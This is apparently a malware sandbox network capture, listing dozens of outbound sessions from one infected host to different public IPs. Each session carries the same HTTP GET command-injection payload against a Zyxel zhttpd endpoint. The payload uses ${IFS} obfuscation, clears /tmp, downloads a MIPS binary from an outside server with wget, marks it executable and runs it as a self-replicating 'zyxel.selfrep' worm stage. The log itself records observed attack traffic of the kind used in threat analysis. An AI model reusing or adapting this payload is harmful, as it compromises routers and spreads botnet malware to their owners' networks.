                                        Jan 14, 2024 16:18:44.444514036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4100192.168.2.1349940107.14.5.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444581985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4101192.168.2.1348434181.133.127.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444633007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4102192.168.2.135251461.76.144.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444690943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4103192.168.2.1342350193.67.101.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444736958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4104192.168.2.1359594111.98.174.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444792032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4105192.168.2.134420045.129.184.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444839954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4106192.168.2.1338108110.97.59.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444909096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4107192.168.2.134618820.163.78.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444967985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4108192.168.2.135704466.57.9.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.444996119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4109192.168.2.133300087.46.8.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445081949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4110192.168.2.1356880184.197.26.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445116043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4111192.168.2.135392219.78.127.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445171118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4112192.168.2.1335154154.29.94.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445225000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4113192.168.2.1344310178.14.172.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445282936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4114192.168.2.13593029.141.189.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445352077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4115192.168.2.1333396129.153.212.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445414066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4116192.168.2.1337870148.164.202.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445451975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4117192.168.2.1351878192.171.62.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445506096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4118192.168.2.1346582200.42.190.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445550919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4119192.168.2.1356082118.8.88.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445614100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4120192.168.2.133350693.236.224.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445667982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4121192.168.2.134101670.179.151.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445719004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4122192.168.2.1333830149.222.101.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445794106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4123192.168.2.135836257.149.113.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445862055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4124192.168.2.1341056186.99.206.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445909977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4125192.168.2.1335374121.85.201.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445951939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4126192.168.2.1350068197.106.49.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.445995092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4127192.168.2.134151095.74.81.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446044922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4128192.168.2.1345218171.157.55.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446100950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4129192.168.2.1352420161.212.69.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446161985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4130192.168.2.1351184183.117.144.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446216106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4131192.168.2.1334366219.213.164.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446268082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4132192.168.2.1350282181.214.169.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446325064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4133192.168.2.1356328125.44.143.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446386099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4134192.168.2.1337968221.91.110.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446436882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4135192.168.2.1360566108.249.18.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446499109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4136192.168.2.133772092.180.156.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446552038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4137192.168.2.135599617.143.83.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446614981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4138192.168.2.134027637.74.120.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446657896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4139192.168.2.134620218.139.90.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446706057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4140192.168.2.1340136136.188.29.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446762085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4141192.168.2.1353820102.205.246.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446825027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4142192.168.2.13365129.100.205.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446851969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4143192.168.2.134613012.72.218.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446913004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4144192.168.2.1355702149.130.77.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.446973085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4145192.168.2.1359796173.116.211.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447035074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4146192.168.2.133696069.224.236.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447087049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4147192.168.2.134111253.105.224.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447123051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4148192.168.2.1355624117.30.159.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447216988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4149192.168.2.134353484.215.93.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447257996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4150192.168.2.135489666.140.15.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447302103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4151192.168.2.1335102178.119.235.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447346926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4152192.168.2.1348988176.199.132.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447374105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4153192.168.2.133744458.36.148.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447431087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4154192.168.2.1345326212.32.175.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447470903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4155192.168.2.1340090133.50.92.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447518110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4156192.168.2.134708248.241.56.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447568893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4157192.168.2.1341006209.207.63.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447607040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4158192.168.2.1346020151.115.62.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447671890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4159192.168.2.134238857.211.246.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447729111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4160192.168.2.1348020119.170.141.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447786093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4161192.168.2.1342524170.136.38.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447823048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4162192.168.2.135902845.212.33.100443
                                        TimestampBytes transferredDirectionData
